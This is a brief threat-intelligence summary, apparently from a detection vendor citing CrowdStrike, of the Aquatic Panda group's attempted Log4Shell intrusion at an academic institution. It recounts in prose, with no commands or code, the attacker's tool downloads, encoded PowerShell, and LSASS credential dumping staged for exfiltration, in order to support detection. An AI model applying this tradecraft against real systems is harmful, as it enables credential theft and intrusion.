December 29, 2021

Aquatic Panda

Industry: Education | Level: Operational | Source: CrowdStrike

Observation of the Log4Shell vulnerability from CrowdStrike’s OverWatch team identified an attempted exploit by “Aquatic Panda” against an unnamed academic institution. It started from reviewing suspicious activity from a Tomcat process running under a vulnerable VMware Horizon instance. A combination of a suspicious activity involved the threat actor running multiple connectivity checks through DNS lookups for a specific subdomain and attempting to execute curl and wget commands to retrieve tools that were also peculiar as the execution of Linux commands were on a Windows host for the Apache Tomcat service. As the affected institution worked towards mitigating the attack, OverWatch researchers continued to track the attack identifying reconnaissance activity for system privileges, downloading additional scripts through a PowerShell Base64-encoded command dropping three files with VBS file extensions and when decoded with “cscript.exe” were identified as an EXE, DLL and DAT file. Attempts to harvest credentials were found when to dump LSASS memory and using WinRAR to compress the memory dump for exfiltration. Eventually, the victim organization was able to patch the vulnerable application and thus stopped any further activity from Aquatic Panda.

  • Anvilogic Scenario: Aquatic Panda – Behaviors